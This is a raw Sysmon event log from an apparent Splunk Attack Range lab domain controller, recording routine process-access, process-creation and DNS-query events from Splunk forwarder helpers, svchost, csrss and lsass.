10:40:21.385{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002329Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:21.385{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002328Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:21.385{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002327Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:21.385{733EE690-3DF7-5F80-0500-000000007F01}644792C:\Windows\system32\csrss.exe{733EE690-3E15-5F80-6D00-000000007F01}3376C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000002326Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:21.385{733EE690-3E09-5F80-3400-000000007F01}20324072C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{733EE690-3E15-5F80-6D00-000000007F01}3376C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000002325Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:21.386{733EE690-3E15-5F80-6D00-000000007F01}3376C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{733EE690-3DF7-5F80-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{733EE690-3E09-5F80-3400-000000007F01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002352Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:22.385{733EE690-3E16-5F80-6E00-000000007F01}26643956C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{733EE690-3E09-5F80-3400-000000007F01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002351Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:22.229{733EE690-3E0A-5F80-3D00-000000007F01}39003920C:\Windows\system32\conhost.exe{733EE690-3E16-5F80-6E00-000000007F01}2664C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002350Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:22.229{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002349Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:22.229{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002348Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:22.229{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002347Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:22.229{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002346Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:22.229{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002345Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:22.229{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002344Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:22.229{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002343Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:22.229{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002342Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:22.229{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002341Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:22.229{733EE690-3DF7-5F80-0500-000000007F01}6441144C:\Windows\system32\csrss.exe{733EE690-3E16-5F80-6E00-000000007F01}2664C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000002340Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:22.229{733EE690-3E09-5F80-3400-000000007F01}20324072C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{733EE690-3E16-5F80-6E00-000000007F01}2664C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000002339Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:22.062{733EE690-3E16-5F80-6E00-000000007F01}2664C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{733EE690-3DF7-5F80-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{733EE690-3E09-5F80-3400-000000007F01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 22542200x80000000000000002381Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:22.635{733EE690-3DF7-5F80-0B00-000000007F01}868_kerberos._tcp.Default-First-Site-Name._sites.dc._msdcs.ATTACKRANGE.LOCAL.1460-C:\Windows\System32\lsass.exe 22542200x80000000000000002380Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:22.057{733EE690-3DF7-5F80-0B00-000000007F01}868_ldap._tcp.Default-First-Site-Name._sites.gc._msdcs.attackrange.local.1460-C:\Windows\System32\lsass.exe 10341000x80000000000000002379Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:23.916{733EE690-3E0A-5F80-3D00-000000007F01}39003920C:\Windows\system32\conhost.exe{733EE690-3E17-5F80-7000-000000007F01}3328C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002378Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:23.916{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002377Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:23.916{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002376Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:23.916{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002375Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:23.916{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002374Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:23.916{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002373Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 